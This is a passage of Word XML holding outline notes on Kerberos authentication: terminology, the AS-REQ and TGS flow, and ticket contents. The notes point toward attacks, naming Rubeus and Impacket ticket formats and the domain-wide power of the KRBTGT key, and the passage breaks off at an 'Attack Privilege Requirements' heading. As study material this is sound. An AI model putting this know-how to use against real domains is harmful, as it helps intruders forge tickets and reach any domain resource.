    <w:p w14:paraId="24C2527D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Kerberos is intended to be more secure than NTLM by using third party ticket authorization and stronger encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE35D13" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Common Terminology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26768FAD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ticket Granting Ticket – authentication ticket used to request service tickets for specific resources from the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D72974C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Key Distribution Center – issues TGTs and service tickets that consist of the Authentication Service and Ticket Granting Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202301F9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Authentication Service – issues TGTs to be used by the TGS in the domain to request access to other machines and service tickets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0F6C3E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ticket Granting Service – takes TGT and returns a ticket to a machine on the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB88EF8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Service Principal Name – identifier given to a service instance to associate a service instance with a domain service account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F519118" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>windows requires that services have a domain service account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473806C2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>why a service needs SPN set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B680D6D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>KDC Long Term Secret Key (KDC LT Key) - The KDC key is based on the KRBTGT service account. It is used to encrypt the TGT and sign the PAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D7FD57" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Client Long Term Secret Key (Client LT Key) - The client key is based on the computer or service account. It is used to check the encrypted timestamp and encrypt the session key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061EDE48" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Service Long Term Secret Key (Service LT Key) - The service key is based on the service account. It is used to encrypt the service portion of the service ticket and sign the PAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69422461" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Session Key - Issued by the KDC when a TGT is issued. The user will provide the session key to the KDC along with the TGT when requesting a service ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297A8E3B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Privilege Attribute Certificate (PAC) - The PAC holds all of the user's relevant information, it is sent along with the TGT to the KDC to be signed by the Target LT Key and the KDC LT Key in order to validate the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAF43F9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>AS-REQ w/ Pre-Authentication in Detail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CF9FCB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>starts when a user requests a TGT from KDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331FDA5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>to validate user and create a TGT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDC870D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>user encrypts a timestamp NT hash and sends it to AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A35A49D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>KDC attempts to decrypt timestamp using NT hash from user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F8D8EE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>if successful – KDC will issue TGT and session key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A6D749" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ticket Granting Ticket Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129DE789" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>TGT provided by user to KDC and KDC validates the TGT and returns a service ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC82858" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Service Ticket Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC08CEF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>contains two portions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBAC47" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>service provided portion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143CF896" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>user details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02194F57" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>session key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20055C9A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>encrypts the ticket with service account NTLM hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BE48EE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>user-provided portion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070099CC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>validity timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D18D797" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>session key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D138355" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>encrypts with the TGT session key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A25F05" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Kerberos Authentication Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2024287F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>AS-REQ – client requests authentication ticket or ticket granting ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26325659" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>AS-REP – KDC verifies client and sends back encrypted TGT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74274F5F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>TGS-REQ – client sends encrypted TGT to TGS with SPN of service clients wants access to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231CF4D0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>TGS-REP – KDC verifies TGT of user and user has access to service, then sends valid session key for the service to the client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E8886F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>AP-REQ – client requests the service and sends the valid session key to prove the user has access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC6DEFD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>AP-REP – service grants access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176599DB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Kerberos Tickets Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCC2979" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>main ticket is a ticket granting ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465FC24D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>.kirbi for Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ADD86A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>.ccache for Impacket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42544F8C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>typically base64 and used for various attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C7D0F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>KRBTGT allows user to get any service ticket, allowing access to anything on domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD68210" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Attack Privilege Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694882F1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
